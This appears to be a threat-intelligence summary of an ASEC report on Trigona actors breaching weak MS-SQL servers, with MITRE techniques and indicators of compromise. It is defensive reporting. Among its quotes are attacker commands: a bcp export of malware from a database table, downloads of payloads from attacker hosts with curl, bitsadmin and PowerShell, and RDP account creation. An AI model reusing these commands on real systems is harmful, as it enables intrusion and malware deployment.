Trigona threat actors continue targeting exposed or weakly protected MS‑SQL servers, using BCP to store and export malware from databases and employing tools like AnyDesk, RDP, Teramind, Rust scanners, and various downloaders. ASEC observed reused Trigona infrastructure and provided IoCs including file hashes, URLs, and IPs for the 2024 campaign. #Trigona #AnyDesk
Keypoints
- Trigona operators attack MS‑SQL servers vulnerable to brute‑force and dictionary attacks, leveraging simple credentials or public exposure.
- After gaining access, attackers run reconnaissance commands (hostname, whoami, systeminfo, tasklist, wmic useraccount, net user) and install additional payloads via CLR Shell and other methods.
- Attackers use bcp.exe to export malware stored in database tables (e.g., table “uGnzBdZbsi” and format file “FODsOZKgAU.txt”) to local file paths.
- Multiple download mechanisms observed: curl, bitsadmin, and PowerShell Invoke-WebRequest fetching executables and batch scripts from attacker-controlled hosts (e.g., 195.66.214[.]79 and cia[.]tf URL).
- Remote control tools include AnyDesk, RDP (with created users like Remote99/Ladmin/erp2), and likely Teramind; AnyDesk installed to %ALLUSERSPROFILE% and manipulated via registry keys.
- Newer malware includes a Rust‑written scanner that reports system and geolocation info to C2 and scans for RDP and MS‑SQL services, plus StressTester (Go) for SQLi and HTTP testing.
- Additional malicious components: privilege escalation utilities, file‑deletion malware (Rust and batch), and payloads that replace executables in specific directories.
MITRE Techniques
- [T1110] Brute Force – Attackers target MS‑SQL accounts with brute‑force and dictionary attacks against servers with weak credentials (“attacking MS-SQL servers that are vulnerable to brute-force and dictionary attacks because their accounts are configured with simple credentials”).
- [T1059] Command and Scripting Interpreter – Use of commands and scripting (whoami, systeminfo, tasklist, wmic, powershell) for discovery and execution (“hostname> whoami> systeminfo> tasklist> wmic useraccount… powershell -Command “net user ladmin”).
- [T1005] Data from Local System – Exporting malware from database binary columns to local files using BCP (“bcp “select binaryTable from uGnzBdZbsi” queryout “C:ProgramDataspd.exe” -T -f “C:ProgramDataFODsOZKgAU.txt””).
- [T1105] Ingress Tool Transfer – Downloading additional payloads via curl, bitsadmin, and PowerShell Invoke-WebRequest (“curl hxxps://cia[.]tf/… -o …”, “bitsadmin /transfer … http://195.66.214[.]79/pci.exe”, “powershell Invoke-WebRequest -Uri “hxxp://195.66.214[.]79/L.bat”).
- [T1021] Remote Services – Use of RDP and AnyDesk for remote access and control, including creating RDP users (“RDP was used to execute a batch file… add a user… Remote99 or Ladmin”; “%SystemDrive%/programdata/AD.exe –install …”).
- [T1218] Signed Binary Proxy Execution – Abuse of legitimate utilities like bcp.exe and bitsadmin to perform malicious actions (“the threat actor used BCP to store malware in the database and then create it as a file locally”; “bitsadmin /transfer …”).
- [T1046] Network Service Discovery – Scanner malware (Rust) enumerates network services and sends system/IP/location info to C2 to identify RDP and MS‑SQL targets (“scanner … sends information about the infected system, including the IP and location information obtained through ‘ip-api.com’ … then performs scans … targets … RDP and MS-SQL”).
- [T1490] Inhibit System Recovery – Malware that deletes files and directories in specific paths to hinder recovery (“malware that deletes directories in paths where the malware is installed… deletes the ‘.exe’ executable files in ‘C:ProgramData’ and ‘C:UsersPublicMusic’”).
Indicators of Compromise
- [MD5 ] Suspicious payload hashes observed in campaign – 2e4d250ecae8635fa3698eba5772a3b9, 3c21181c35d955f9e557417998c38942 (and 3 more hashes).
- [URL ] Malicious download and installer locations hosted by attacker-controlled server – http[:]//195[.]66[.]214[.]79/AD[.]exe, http[:]//195[.]66[.]214[.]79/L[.]bat (and additional paths such as AD.msi, Monitor.exe, drivers.txt).
- [IP ] Command and control / hosting infrastructure – 179[.]43[.]159[.]186, 198[.]55[.]98[.]133 (used alongside 195[.]66[.]214[.]79 observed in download URLs).
- [File/Artifact ] Database table and format file names used to store/export malware – table “uGnzBdZbsi”, format file “FODsOZKgAU.txt” (used in bcp export commands creating spd.exe, AD.exe, L.bat, pci2.exe locally).
Read more: https://asec.ahnlab.com/en/90793/